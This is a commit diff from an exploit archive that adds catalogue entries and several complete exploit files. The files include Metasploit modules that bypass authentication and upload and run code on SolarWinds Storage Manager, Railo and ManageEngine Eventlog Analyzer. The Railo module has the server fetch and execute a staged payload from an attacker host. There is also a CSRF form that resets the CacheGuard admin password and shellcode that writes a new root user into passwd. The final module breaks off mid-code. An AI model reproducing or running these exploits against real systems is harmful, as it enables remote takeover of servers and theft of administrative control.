Updated 09_17_2014
This commit is contained in:
parent
1d4c17cad7
commit
d1f84651f9
23 changed files with 1238 additions and 2 deletions
21
files.csv
21
files.csv
|
@ -31197,3 +31197,24 @@ id,file,description,date,author,platform,type,port
|
|||
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
|
||||
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
|
||||
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
|
||||
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
|
||||
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
|
||||
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
|
||||
34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 'login.php' Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
|
||||
34653,platforms/php/webapps/34653.txt,"e107 0.7.23 Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0
|
||||
34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution Vulnerability",2010-09-20,anT!-Tr0J4n,windows,remote,0
|
||||
34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0
|
||||
34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
|
||||
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
|
||||
34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
|
||||
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
|
||||
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
|
||||
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
|
||||
34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF Vulnerability",2014-09-15,"William Costa",linux,webapps,8090
|
||||
|
|
Can't render this file because it is too large.
|
144
platforms/java/remote/34671.rb
Executable file
144
platforms/java/remote/34671.rb
Executable file
|
@ -0,0 +1,144 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SolarWinds Storage Manager Authentication Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
|
||||
The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
|
||||
with specially crafted URLs. After bypassing authentication, is possible to use a file
|
||||
upload function to achieve remote code execution. This module has been tested successfully
|
||||
in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
|
||||
Linux 64 bits operating systems.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['ZDI', '14-299']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => %w{ linux win },
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
['Solarwinds Store Manager <= 5.7.1', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 19 2014'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9000)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
|
||||
print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
|
||||
if upload(jsp_info, jsp_path)
|
||||
print_good("#{peer} - JSP payload uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
|
||||
end
|
||||
|
||||
res = execute(jsp_info)
|
||||
|
||||
if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
|
||||
upload_path = $1
|
||||
print_good("#{peer} - Working directory found in #{upload_path}")
|
||||
register_file_for_cleanup(::File.join(upload_path, jsp_info))
|
||||
else
|
||||
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
|
||||
print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
|
||||
end
|
||||
|
||||
jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
|
||||
print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
|
||||
if upload(jsp_payload, payload.encoded)
|
||||
print_good("#{peer} - JSP payload uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
|
||||
end
|
||||
|
||||
if upload_path
|
||||
register_file_for_cleanup(::File.join(upload_path, jsp_payload))
|
||||
else
|
||||
print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
execute(jsp_payload, 1)
|
||||
end
|
||||
|
||||
def execute(jsp_name, time_out = 20)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("/", "images", "..", jsp_name),
|
||||
'method' => 'GET'
|
||||
}, time_out)
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
def upload(file_name, contents)
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(contents,
|
||||
"application/octet-stream",
|
||||
nil,
|
||||
"form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => post_data.to_s
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def jsp_path
|
||||
jsp =<<-EOS
|
||||
<%@ page language="Java" import="java.util.*"%>
|
||||
<%
|
||||
out.println("Path:" + System.getProperty("server.webapp.root"));
|
||||
%>
|
||||
EOS
|
||||
|
||||
jsp
|
||||
end
|
||||
|
||||
end
|
|
@ -17,7 +17,7 @@ open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , clo
|
|||
setreuid() , execve('/bin/sh')
|
||||
|
||||
|
||||
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
|
||||
root@user:~/Desktop/xpl# objdump -d f.o
|
||||
|
||||
f.o: file format elf32-i386
|
||||
|
||||
|
@ -190,7 +190,7 @@ Disassembly of section .text:
|
|||
203: b0 01 mov $0x1,%al
|
||||
205: b3 01 mov $0x1,%bl
|
||||
207: cd 80 int $0x80
|
||||
root@g3n3rall:~/Desktop/xpl#
|
||||
root@user:~/Desktop/xpl#
|
||||
|
||||
|
||||
|
||||
|
|
104
platforms/linux/webapps/34672.txt
Executable file
104
platforms/linux/webapps/34672.txt
Executable file
|
@ -0,0 +1,104 @@
|
|||
I. VULNERABILITY
|
||||
|
||||
-------------------------
|
||||
|
||||
CSRF vulnerabilities in CacheGuard-OS v5.7.7
|
||||
|
||||
II. BACKGROUND
|
||||
|
||||
-------------------------
|
||||
|
||||
CacheGuard is an All-in-One Web Security Gateway providing firewall,
|
||||
web antivirus, caching, compression, URL filtering, proxy, high
|
||||
availability, content filtering, bandwidth saving, bandwidth shaping,
|
||||
Quality of Service and more.
|
||||
|
||||
|
||||
|
||||
III. DESCRIPTION
|
||||
|
||||
-------------------------
|
||||
|
||||
Has been detected a CSRF vulnerability in CacheGuard in
|
||||
"/gui/password-wadmin.apl"
|
||||
|
||||
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
|
||||
-------------------------
|
||||
|
||||
The application does not validate the parameter any csrf_token
|
||||
"/gui/password-wadmin.apl".
|
||||
|
||||
|
||||
|
||||
<html>
|
||||
|
||||
|
||||
|
||||
<body onload="CSRF.submit();">
|
||||
|
||||
<br>
|
||||
|
||||
<br>
|
||||
|
||||
|
||||
|
||||
<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl"
|
||||
method="post" name="CSRF">
|
||||
|
||||
<input name="password1" value="admin@1234" type=hidden> </input>
|
||||
|
||||
<input name="password2" value="admin@1234" type=hidden> </input>
|
||||
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
|
||||
-------------------------
|
||||
|
||||
|
||||
|
||||
CSRF allow the execution attackers to modify settings or change
|
||||
password of user administrator in CacheGuard, because this functions
|
||||
are not protected by CSRF-Tokens.
|
||||
|
||||
|
||||
|
||||
VI. REQUIREMENTS
|
||||
|
||||
-----------------------
|
||||
|
||||
An Attacker needs to know the IP of the device.
|
||||
|
||||
An Administrator needs an authenticated connection to the device.
|
||||
|
||||
|
||||
|
||||
VII. SYSTEMS AFFECTED
|
||||
|
||||
-------------------------
|
||||
|
||||
Try CacheGuard-OS v5.7.7
|
||||
|
||||
|
||||
|
||||
VIII. SOLUTION
|
||||
|
||||
-------------------------
|
||||
|
||||
All functions must be protected by CSRF-Tokens.
|
||||
|
||||
http://www.kb.cert.org/vuls/id/241508
|
||||
|
||||
By William Costa
|
||||
william.costa no spam gmail.com
|
189
platforms/multiple/remote/34669.rb
Executable file
189
platforms/multiple/remote/34669.rb
Executable file
|
@ -0,0 +1,189 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Railo Remote File Include',
|
||||
'Description' => '
|
||||
This module exploits a remote file include vulnerability in Railo,
|
||||
tested against version 4.2.1. First, a call using a vulnerable
|
||||
<cffile> line in thumbnail.cfm allows an atacker to download an
|
||||
arbitrary PNG file. By appending a .cfm, and taking advantage of
|
||||
a directory traversal, an attacker can append cold fusion markup
|
||||
to the PNG file, and have it interpreted by the server. This is
|
||||
used to stage and execute a fully-fledged payload.
|
||||
',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
|
||||
'bperry' # metasploited
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-5468'],
|
||||
['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 99999, # if there is disk space, I think we will fit
|
||||
'BadChars' => "",
|
||||
'DisableNops' => true,
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
|
||||
}
|
||||
},
|
||||
'Platform' => %w( unix ),
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic',
|
||||
{
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 26 2014'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
|
||||
OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
|
||||
)
|
||||
|
||||
if !res
|
||||
fail_with(Failure::Unknown, 'Server did not respond')
|
||||
elsif !res.body
|
||||
fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
|
||||
end
|
||||
|
||||
new_md5 = Rex::Text.md5(res.body)
|
||||
|
||||
return Exploit::CheckCode::Appears if new_md5 == md5
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
|
||||
end
|
||||
|
||||
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
|
||||
|
||||
@shell_name = Rex::Text.rand_text_alpha(15)
|
||||
stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
|
||||
|
||||
start_service('Uri' => {
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_stager(cli, req)
|
||||
end,
|
||||
'Path' => '/' + stager_name
|
||||
})
|
||||
|
||||
start_service('Uri' => {
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_shell(cli, req)
|
||||
end,
|
||||
'Path' => '/' + @shell_name
|
||||
})
|
||||
|
||||
wh = '5000' # width and height
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
|
||||
'vars_get' => {
|
||||
'img' => url + '/' + stager_name,
|
||||
'height' => wh,
|
||||
'width' => wh
|
||||
}
|
||||
)
|
||||
|
||||
if !res
|
||||
fail_with(Failure::Unknown, 'Server did not respond')
|
||||
elsif res.code != 500
|
||||
fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
|
||||
end
|
||||
|
||||
print_status('Waiting for first stage to download...')
|
||||
|
||||
i = datastore['STAGEWAIT']
|
||||
while !@staged && i > 0
|
||||
select(nil, nil, nil, 1)
|
||||
print_status("Waiting for #{i} more seconds...")
|
||||
i = i - 1
|
||||
end
|
||||
|
||||
@staged = false
|
||||
|
||||
if i == 0
|
||||
fail_with(Failure::Unknown, 'Server did not request the stager.')
|
||||
end
|
||||
|
||||
hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET
|
||||
|
||||
hash.upcase!
|
||||
|
||||
print_status('Executing stager')
|
||||
|
||||
send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
|
||||
'vars_get' => {
|
||||
'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
|
||||
'thistag.executionmode' => 'start'
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
def on_request_shell(cli, _request)
|
||||
print_status('Sending payload')
|
||||
send_response(cli, payload.encoded, {})
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def on_request_stager(cli, _request)
|
||||
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
|
||||
|
||||
stager = "<cfhttp method='get' url='#{url}'"
|
||||
stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
|
||||
stager << " file='#{@shell_name}'>"
|
||||
stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"
|
||||
|
||||
png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
|
||||
png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='
|
||||
|
||||
# A very small PNG file
|
||||
png = Rex::Text.decode_base64(png)
|
||||
|
||||
stager.each_byte do |b|
|
||||
png << b
|
||||
end
|
||||
|
||||
png << 0x00
|
||||
|
||||
print_status('Sending stage. This might be sent multiple times.')
|
||||
send_response(cli, png, 'Content-Type' => 'image/png')
|
||||
|
||||
@staged = true
|
||||
|
||||
handler(cli)
|
||||
end
|
||||
end
|
343
platforms/multiple/remote/34670.rb
Executable file
343
platforms/multiple/remote/34670.rb
Executable file
|
@ -0,0 +1,343 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
|
||||
The vulnerability exists in the agentUpload servlet which accepts unauthenticated
|
||||
file uploads and handles zip file contents in a insecure way. By combining both
|
||||
weaknesses a remote attacker can achieve remote code execution. This module has been
|
||||
tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
|
||||
between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
|
||||
while versions 8.1+ are only exploitable via a JSP upload.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'h0ng10', # Vulnerability discovery
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-6037' ],
|
||||
[ 'OSVDB', '110642' ],
|
||||
[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 5 },
|
||||
'Privileged' => false, # Privileged on Windows but not on Linux targets
|
||||
'Platform' => %w{ java linux win },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
|
||||
{
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
'WfsDelay' => 30
|
||||
}
|
||||
],
|
||||
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 31 2014'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8400),
|
||||
OptInt.new('SLEEP',
|
||||
[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_version
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("event/index3.do"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
|
||||
return $1
|
||||
end
|
||||
end
|
||||
|
||||
return "0"
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
version = get_version
|
||||
if version >= "7" and version <= "9"
|
||||
# version 7 to < 8.1 detection
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("event/agentUpload"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res and res.code == 405
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
# version 8.1+ detection
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("agentUpload"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res and res.code == 405 and version == 8
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
# We can't be sure that it is vulnerable in version 9
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def create_zip_and_upload(payload, target_path, is_payload = true)
|
||||
# Zipping with CM_STORE to avoid errors decompressing the zip
|
||||
# in the Java vulnerable application
|
||||
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
|
||||
zip.add_file(target_path, payload)
|
||||
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
|
||||
|
||||
data = post_data.to_s
|
||||
|
||||
if is_payload
|
||||
print_status("#{peer} - Uploading payload...")
|
||||
end
|
||||
res = send_request_cgi({
|
||||
'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.empty?
|
||||
if is_payload
|
||||
print_status("#{peer} - Payload uploaded successfully")
|
||||
end
|
||||
register_files_for_cleanup(target_path.gsub("../../", "../"))
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def pick_target
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
print_status("#{peer} - Determining target")
|
||||
|
||||
version = get_version
|
||||
|
||||
if version == "7"
|
||||
return targets[1]
|
||||
end
|
||||
|
||||
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
|
||||
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
|
||||
target_dir = "../../webapps/event/"
|
||||
if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
|
||||
if version == "8"
|
||||
# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
|
||||
return targets[1]
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(jsp_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
if res.body.to_s =~ /Windows/
|
||||
return targets[2]
|
||||
else
|
||||
# assuming Linux
|
||||
return targets[3]
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
|
||||
def generate_jsp_payload
|
||||
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
|
||||
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
|
||||
exe = generate_payload_exe(opts)
|
||||
base64_exe = Rex::Text.encode_base64(exe)
|
||||
|
||||
native_payload_name = rand_text_alpha(rand(6)+3)
|
||||
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
|
||||
|
||||
var_raw = rand_text_alpha(rand(8) + 3)
|
||||
var_ostream = rand_text_alpha(rand(8) + 3)
|
||||
var_buf = rand_text_alpha(rand(8) + 3)
|
||||
var_decoder = rand_text_alpha(rand(8) + 3)
|
||||
var_tmp = rand_text_alpha(rand(8) + 3)
|
||||
var_path = rand_text_alpha(rand(8) + 3)
|
||||
var_proc2 = rand_text_alpha(rand(8) + 3)
|
||||
|
||||
if @my_target['Platform'] == 'linux'
|
||||
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
chmod = %Q|
|
||||
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
|
||||
Thread.sleep(200);
|
||||
|
|
||||
|
||||
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
|
||||
cleanup = %Q|
|
||||
Thread.sleep(200);
|
||||
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
||||
|
|
||||
else
|
||||
chmod = ''
|
||||
cleanup = ''
|
||||
end
|
||||
|
||||
jsp = %Q|
|
||||
<%@page import="java.io.*"%>
|
||||
<%@page import="sun.misc.BASE64Decoder"%>
|
||||
<%
|
||||
try {
|
||||
String #{var_buf} = "#{base64_exe}";
|
||||
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
||||
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
||||
|
||||
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
|
||||
String #{var_path} = #{var_tmp}.getAbsolutePath();
|
||||
|
||||
BufferedOutputStream #{var_ostream} =
|
||||
new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
||||
#{var_ostream}.write(#{var_raw});
|
||||
#{var_ostream}.close();
|
||||
#{chmod}
|
||||
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
|
||||
#{cleanup}
|
||||
} catch (Exception e) {
|
||||
}
|
||||
%>
|
||||
|
|
||||
|
||||
jsp = jsp.gsub(/\n/, '')
|
||||
jsp = jsp.gsub(/\t/, '')
|
||||
jsp = jsp.gsub(/\x0d\x0a/, "")
|
||||
jsp = jsp.gsub(/\x0a/, "")
|
||||
|
||||
return jsp
|
||||
end
|
||||
|
||||
|
||||
def exploit_native
|
||||
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# Fail if this is the case and ask the user to select an appropriate payload.
|
||||
if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
|
||||
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
|
||||
end
|
||||
|
||||
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
|
||||
target_dir = "../../webapps/event/"
|
||||
|
||||
jsp_payload = generate_jsp_payload
|
||||
if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
|
||||
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
|
||||
end
|
||||
|
||||
return jsp_name
|
||||
end
|
||||
|
||||
|
||||
def exploit_java
|
||||
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# Fail if this is the case and ask the user to select an appropriate payload.
|
||||
if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
|
||||
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
|
||||
end
|
||||
|
||||
target_dir = "../../server/default/deploy/"
|
||||
|
||||
# First we generate the WAR with the payload...
|
||||
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
war_payload = payload.encoded_war({ :app_name => war_app_base })
|
||||
|
||||
# ... and then we create an EAR file that will contain it.
|
||||
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
|
||||
|
||||
# Zipping with CM_STORE to avoid errors while decompressing the zip
|
||||
# in the Java vulnerable application
|
||||
